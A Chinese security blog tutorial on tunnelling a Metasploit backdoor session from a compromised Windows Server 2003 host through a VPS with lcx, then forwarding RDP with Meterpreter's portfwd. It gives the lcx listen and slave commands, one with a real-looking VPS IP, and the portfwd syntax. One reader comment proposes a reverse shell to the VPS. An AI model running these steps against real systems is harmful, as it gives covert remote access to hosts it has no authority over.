使用 Msf 和 lcx 进行 Port Tunnel

2017-02-08 10,100

本文《使用 Msf 和 lcx 进行 Port Tunnel》armyzer0团队原创投稿安全脉搏,安全脉搏独家发表本文,如需要转载,请先联系安全脉搏授权;未经授权请勿转载。

使用 Msf  lcx 进行 Port Tunnel

Tunnel1

连接示意图

VPS 服务器上用 lcx 工具进行端口监听

lcx -listen 5353 3535

Tunnel2

 

Attack Target (Windows Server 2003) 服务器上运行 Msf后门并用 lcx 工具进行端口转发

 

Windows Server 2003 网络配置

Tunnel3

Tunnel4

 

运行 Msf 后门程序

Tunnel5

 

运行 lcx 工具链接 VPS 服务器进行本地端口转发

lcx -slave 172.87.24.247 5353 127.0.0.1 9009

 

Tunnel6

Tunnel7

(VPS 上可看到来自 Attack Target 的网络连接)

 

BackBox 上启动 msfconsole 进行后门链接

Backbox 网络配置

Tunnel8

启动 msfconsole 加载 exploit/multi/handler

Tunnel10

Tunnel9

 

Msf 终端下执行 run 命令启动链接

Tunnel11

Meterpreter 内网端口转发

Portfwd命令简单端口转发(本地 3389 远程桌面转发)

Tunnel13

 

Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L <opt>  The local host to listen on (optional).

-h        Help banner.

-l <opt>  The local port to listen on.

-p <opt>  The remote port to connect to.

-r <opt> The remote host to connect to.

-L 选项指定本地监听的主机(即 Backbox 主机,可简单指定为:0.0.0.0)

-l 选项指定本地监听的端口(即 Backbox 主机监听的端口,可简单指定为:3389)

-p 选项指定远程主机要转发的端口(例如 Attack Target(Windows Server 2003)上的 3389 端口)

-r 选项制定远程主机网络地址(例如 Attack Target(Windows Server 2003) 的 127.0.0.1)

Tunnel12

转发远程主机 3389 进行远程桌面链接

 

Portfwd add -L 0.0.0.0 -l 3389 -r 127.0.0.1 -p 3389

Tunnel14

连接 Backbox 主机的 3389 端口

 

Tunnel15

Tunnel16

行文至末,属于比较详细的图文记录档案,可作为参考备用,欢迎不断查阅。

本文《使用 Msf 和 lcx 进行 Port Tunnel》armyzer0团队原创投稿安全脉搏,安全脉搏独家发表本文,如需要转载,请先联系安全脉搏授权;未经授权请勿转载。

本文作者:armyzer0

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/55314.html

Tags:
评论  (4)
快来写下你的想法吧!
  • heh3 2017-02-08 17:45:30

    sofa

  • 路人乙 2017-02-09 15:09:47

    内网那里多此一举了,不用lcx slave转发,不用bind shell,直接一个reverse shell反弹到vps上,攻击机再bind shell就行了。没有必要既拿shell侦听,然后用lcx转发。

  • aimorc 2017-03-11 13:32:32

    想转载怎么办

armyzer0

文章数:8 积分: 2

team.armyzer0.com “剑 之 所 指,心 之 所 向”

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号